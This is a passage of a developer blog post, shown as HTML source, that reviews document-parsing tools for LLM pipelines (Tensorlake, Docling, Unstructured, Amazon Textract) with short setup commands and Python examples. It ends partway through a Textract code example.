&lt;p&gt;This above code creates a city guide application using OpenAI Agents with tool calls. I'm not going to explain the code here, as the blog will get unnecessarily longer.&lt;/p&gt;

&lt;p&gt;You can find the explanation for this code in their &lt;a href="https://github.com/tensorlakeai/tensorlake#agentic-applications-quickstart" rel="noopener noreferrer"&gt;GitHub README&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Deploying and running on Tensorlake Cloud
&lt;/h3&gt;

&lt;p&gt;To run the application on Tensorlake Cloud, it first needs to be deployed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Set &lt;code&gt;TENSORLAKE_API_KEY&lt;/code&gt; in your shell session:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;TENSORLAKE_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Paste your API key here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Set &lt;code&gt;OPENAI_API_KEY&lt;/code&gt; in your Tensorlake Secrets so that your application can make calls to OpenAI:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;tensorlake secrets &lt;span class="nb"&gt;set &lt;/span&gt;OPENAI_API_KEY &lt;span class="s2"&gt;"Paste your API key here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Deploy the application to Tensorlake Cloud:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;tensorlake deploy examples/readme_example/city_guide.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Run the remote test script found in &lt;code&gt;examples/readme_example/test_remote_app.py&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.applications&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;run_remote_application&lt;/span&gt;

&lt;span class="n"&gt;city&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;San Francisco&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# Run the application remotely
&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;run_remote_application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_app&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Request ID: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Get the output
&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;output&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The application will execute on Tensorlake Cloud, with each function running in its own isolated sandbox.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To put it short, Tensorlake takes care of spinning up containers, injecting secrets and keeping the function durable so it can retry tool calls without you building your own queue system.&lt;/p&gt;

&lt;p&gt;Here's a quick Tensorlake document ingestion demo to see it in action working with a complex document. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/bjDfakRAGBk"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://www.docling.ai/" rel="noopener noreferrer"&gt;2. Docling&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjd78iaxshyax8eb9c62k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjd78iaxshyax8eb9c62k.png" alt="Docling"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Docling is from the IBM Research Team, licensed under MIT (free and open to commercial use), and turns PDFs, Office docs, images, audio and more into a unified DoclingDocument format. You can then export that into markdown, HTML, DocTags or lossless JSON and plug it straight into RAG, agents or search.&lt;/p&gt;

&lt;p&gt;It runs locally and comes with strong layout and table understanding plus OCR and vision models for scanned or complex documents.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Multi format parsing&lt;/strong&gt; - PDF, DOCX, PPTX, XLSX, HTML, images, audio and more into one structured representation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Advanced PDF understanding&lt;/strong&gt; - Page layout, reading order, tables, code, formulas and images handled out of the box.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Multiple export targets&lt;/strong&gt; - Export a single DoclingDocument to markdown, HTML, DocTags or structured JSON.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Local and privacy friendly&lt;/strong&gt; - Designed to run completely locally.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Gen AI integrations&lt;/strong&gt; - Hooks into LangChain, LlamaIndex, Haystack and others out of the box.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And many more...&lt;/p&gt;

&lt;h2&gt;
  
  
  Code Example - Convert and print markdown
&lt;/h2&gt;

&lt;p&gt;The basic flow is intentionally simple: create a converter, give it a source and then decide how you want to export the result.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;docling.document_converter&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DocumentConverter&lt;/span&gt;

&lt;span class="n"&gt;source&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://arxiv.org/pdf/2408.09869&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;  &lt;span class="c1"&gt;# can also be a local Path(...)
&lt;/span&gt;&lt;span class="n"&gt;converter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DocumentConverter&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;converter&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;convert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;source&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;markdown&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;export_to_markdown&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;markdown&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This example shows the “one document in, one markdown document out” path that you would usually add into your indexing step.&lt;/p&gt;

&lt;p&gt;This gives you one markdown document you can split into chunks and feed into a vector database.&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Same idea from the CLI
&lt;/h3&gt;

&lt;p&gt;Docling also comes with a CLI. You can install it with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;docling
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, you can run it using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Convert a PDF at a URL to markdown on stdout&lt;/span&gt;
docling https://arxiv.org/pdf/2206.01062

&lt;span class="c"&gt;# Use the GraniteDocling vision language model in the pipeline&lt;/span&gt;
docling &lt;span class="nt"&gt;--pipeline&lt;/span&gt; vlm &lt;span class="nt"&gt;--vlm-model&lt;/span&gt; granite_docling https://arxiv.org/pdf/2206.01062
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Obviously, there are a few more complex use cases with a lot more flags you can add. For this, visit their &lt;a href="https://docling-project.github.io/docling/" rel="noopener noreferrer"&gt;documentation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's a quick video by Red Hat to see it in action. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/BWxdLm1KqTU"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://unstructured.io/" rel="noopener noreferrer"&gt;3. Unstructured&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwpi9h5jvusb3kvtoazvy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwpi9h5jvusb3kvtoazvy.png" alt="Unstructured"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Unstructured gives you an open source library plus a managed platform to turn unstructured content into structured data for LLM apps. It partitions PDFs, slides, HTML, Office files and images into a standard set of elements that downstream tools can easily consume.&lt;/p&gt;

&lt;p&gt;On top of that, the ingest layer adds connectors, chunking and embeddings so you can build full ETL style pipelines around your document sources.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;One partition API&lt;/strong&gt; autodetects file type and routes to the right parser for you.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLM friendly outputs&lt;/strong&gt; structured elements with text, metadata and coordinates when needed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Source and destination connectors&lt;/strong&gt; GitHub, S3 and more via the Ingest CLI and Python library.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hosted Partition Endpoint&lt;/strong&gt; offloads compute to their API when you want better models or scale.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jx8voz5sfd0nevfv399.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jx8voz5sfd0nevfv399.png" alt="Unstructured - Designed to scale"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Quickstart with &lt;code&gt;partition&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;This is the core pattern you will see in most examples, and it is enough to plug into a RAG pipeline.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;unstructured.partition.auto&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;partition&lt;/span&gt;

&lt;span class="c1"&gt;# Read and partition a document
&lt;/span&gt;&lt;span class="n"&gt;elements&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;partition&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;example-docs/layout-parser-paper.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Inspect a few elements
&lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;el&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;elements&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;repr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;el&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;category&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;el&lt;/span&gt;&lt;span class="p"&gt;)[:&lt;/span&gt;&lt;span class="mi"&gt;80&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;...&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You end up with a list of elements that know their category, which makes it easy to filter for titles, paragraphs or tables before you use it further.&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Batch processing with Ingest CLI
&lt;/h3&gt;

&lt;p&gt;For real projects you usually need to process many files at once and save the outputs somewhere. It comes with an ingest CLI and is built for exactly that.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Chunk and partition an entire folder of files&lt;/span&gt;
unstructured-ingest &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nb"&gt;local&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--input-path&lt;/span&gt; &lt;span class="nv"&gt;$LOCAL_FILE_INPUT_DIR&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--output-dir&lt;/span&gt; &lt;span class="nv"&gt;$LOCAL_FILE_OUTPUT_DIR&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--chunking-strategy&lt;/span&gt; by_title &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--chunk-max-characters&lt;/span&gt; 1024 &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--partition-by-api&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--api-key&lt;/span&gt; &lt;span class="nv"&gt;$UNSTRUCTURED_API_KEY&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--partition-endpoint&lt;/span&gt; &lt;span class="nv"&gt;$UNSTRUCTURED_API_URL&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--strategy&lt;/span&gt; hi_res
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This runs a full pipeline that reads documents from &lt;code&gt;LOCAL_FILE_INPUT_DIR&lt;/code&gt;, partitions them with the &lt;code&gt;hi_res&lt;/code&gt; strategy, chunks them by title and writes the structured outputs into your output directory. From there, you can index or analyze them however you like.&lt;/p&gt;

&lt;p&gt;Here's a quick API quickstart to get an idea. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/0EogKNU_BPU"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://aws.amazon.com/textract/" rel="noopener noreferrer"&gt;4. Amazon Textract&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23tu7ng9io04tkan6z4k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23tu7ng9io04tkan6z4k.png" alt="Amazon Textract"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Amazon Textract is AWS’s managed OCR and document analysis service that pulls text, handwriting, layout and structured data out of scanned documents and PDFs.&lt;/p&gt;

&lt;p&gt;It runs inside your AWS account, plugs into services like S3, Lambda, SNS and SQS, and is used at scale by companies like PayTM for document workflows.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Structured extraction&lt;/strong&gt; pulls data from tables, forms and key value pairs, not just plain text.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layout and handwriting support&lt;/strong&gt; detects paragraphs, titles, layout elements and handwritten text in scans.&lt;/li&gt;
&lt;li&gt;Works naturally with S3, Lambda, SNS, SQS and other AWS services.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sync and async APIs&lt;/strong&gt; low latency calls for single pages plus batch jobs for large multipage docs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security and compliance&lt;/strong&gt; encryption, IAM and regional controls for regulated workloads.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Code Example: Detect text from a local file
&lt;/h3&gt;

&lt;p&gt;This is the basic pattern if you just want the text out of a document. You read the file as bytes, call &lt;code&gt;detect_document_text&lt;/code&gt; and print the lines Textract finds.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;

&lt;span class="n"&gt;textract&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;textract&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# uses your AWS credentials
&lt;/span&gt;
&lt;span class="n"&gt;file_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sample-doc.png&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;  &lt;span class="c1"&gt;# can be any image format
&lt;/span&gt;
&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;rb&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;image_bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;textract&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;detect_document_text&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;Document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Bytes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;image_bytes&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;BlockType&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;LINE&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Text&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What is happening here:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Textract analyzes the image or PDF and returns a list of Blocks that represent words, lines and other elements.&lt;/li&gt;
&lt;li&gt;You filter for blocks of type LINE and print their Text, which is enough for many basic OCR use cases or as a first step before sending text into an LLM.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Code Example: Extract tables and forms from S3
&lt;/h3&gt;

&lt;p&gt;To pull structured data from forms and tables, you use &lt;code&gt;analyze_document&lt;/code&gt; with the &lt;code&gt;FORMS&lt;/code&gt; and &lt;code&gt;TABLES&lt;/code&gt; feature types and point Textract at a document in S3.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;

&lt;span class="n"&gt;textract&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;textract&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;bucket_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;my-doc-bucket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;object_key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;invoices/invoice-001.png&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;textract&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;analyze_document&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;Document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;S3Object&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Bucket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;bucket_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;object_key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="n"&gt;FeatureTypes&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;FORMS&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TABLES&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

